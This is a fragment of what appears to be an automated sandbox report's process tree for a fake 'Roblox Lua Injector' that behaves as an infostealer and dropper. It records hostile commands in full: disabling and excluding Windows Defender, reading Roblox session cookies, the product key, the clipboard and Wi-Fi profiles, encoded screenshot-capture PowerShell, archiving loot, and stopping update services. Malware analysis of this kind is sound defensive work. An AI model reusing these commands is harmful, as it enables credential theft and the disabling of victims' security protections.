gACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5940 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tq40izlo\tq40izlo.cmdline"5⤵PID:5188
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3D4D.tmp" "c:\Users\Admin\AppData\Local\Temp\tq40izlo\CSCBCE794269DF248179D952711C4F2B5ED.TMP"6⤵PID:5900
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:5876
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:5288
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:5464
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:5576
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"3⤵PID:5596
-
C:\Windows\system32\attrib.exeattrib -r C:\Windows\System32\drivers\etc\hosts4⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:5292
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:5228
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:1476
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:2772
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:6120
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"3⤵PID:3884
-
C:\Windows\system32\attrib.exeattrib +r C:\Windows\System32\drivers\etc\hosts4⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:6136
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:5368
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:5396
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:5896
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:5740
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1824"3⤵PID:5788
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 18244⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5652
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1824"3⤵PID:5408
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 18244⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5648
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 864"3⤵PID:6104
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 8644⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6016
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 864"3⤵PID:5960
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 8644⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5836
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1556"3⤵PID:5396
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 15564⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6080
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1556"3⤵PID:5288
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 15564⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5504
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 548"3⤵PID:5824
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 5484⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4684
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 548"3⤵PID:1688
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 5484⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1336
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 428"3⤵PID:1800
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 4284⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2396
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 428"3⤵PID:3848
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 4284⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4544
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4128"3⤵PID:5016
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 41284⤵
- Kills process with taskkill
PID:1360
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4128"3⤵PID:5360
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 41284⤵
- Kills process with taskkill
PID:3584
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1936"3⤵PID:5860
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 19364⤵
- Kills process with taskkill
PID:3156
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1936"3⤵PID:5492
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 19364⤵
- Kills process with taskkill
PID:5704
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1860"3⤵PID:1784
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 18604⤵
- Kills process with taskkill
PID:444
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1860"3⤵PID:5820
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 18604⤵
- Kills process with taskkill
PID:4368
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"3⤵PID:1828
-
C:\Windows\system32\getmac.exegetmac4⤵PID:5760
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"3⤵PID:6132
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5596
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"3⤵PID:5536
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Suspicious behavior: EnumeratesProcesses
PID:5876
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI33722\rar.exe a -r -hp"dextycloud" "C:\Users\Admin\AppData\Local\Temp\mRntk.zip" *"3⤵PID:1704
-
C:\Users\Admin\AppData\Local\Temp\_MEI33722\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI33722\rar.exe a -r -hp"dextycloud" "C:\Users\Admin\AppData\Local\Temp\mRntk.zip" *4⤵
- Executes dropped EXE
PID:6092
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"3⤵PID:5440
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption4⤵PID:5880
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"3⤵PID:4112
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory4⤵PID:5752
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵PID:3500
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵PID:3588
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"3⤵PID:5996
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1088
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵PID:5940
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:2780
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"3⤵PID:2036
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault4⤵
- Suspicious behavior: EnumeratesProcesses
PID:2380
-
-
-
-
C:\ProgramData\ptguvtswbjga\arihotnjnjhl.exeC:\ProgramData\ptguvtswbjga\arihotnjnjhl.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:396 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4896
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵PID:4428
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:2180
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:3764
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:2776
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:4936
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:6116
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:5556
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
PID:6016
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
PID:464
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
PID:3888
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
PID:6024
-
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵PID:5964
-
-
C:\Windows\explorer.exeexplorer.exe2⤵PID:5400
-
-
C:\Users\Admin\Desktop\Roblox-Lua-Injector-main\Bootstrapper.exe"C:\Users\Admin\Desktop\Roblox-Lua-Injector-main\Bootstrapper.exe"1⤵PID:5504
-
C:\Users\Admin\Desktop\Roblox-Lua-Injector-main\Bootstrapper.exe"C:\Users\Admin\Desktop\Roblox-Lua-Injector-main\Bootstrapper.exe"2⤵
- Loads dropped DLL
PID:3500 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Roblox-Lua-Injector-main\Bootstrapper.exe'"3⤵PID:5352
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Roblox-Lua-Injector-main\Bootstrapper.exe'4⤵
- Command and Scripting Interpreter: PowerShell
PID:5196
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵PID:3484
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
PID:1360
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"3⤵PID:1248
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'4⤵
- Command and Scripting Interpreter: PowerShell
PID:5464
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "start bound.exe"3⤵PID:4380
-
C:\Users\Admin\AppData\Local\Temp\bound.exebound.exe4⤵
- Executes dropped EXE
PID:4528
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"3⤵PID:4544
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'4⤵
- Command and Scripting Interpreter: PowerShell
PID:5256
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:3688
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:460
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:2804
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:6004
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵PID:5348
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵PID:4980
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:1028 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
PID:2876
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:3392
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:2152
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:4204
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:6064
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:5812 -
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:1752
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵PID:2824
-
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:2204
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"3⤵PID:3780
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath4⤵PID:1588
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="3⤵PID:3060
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBv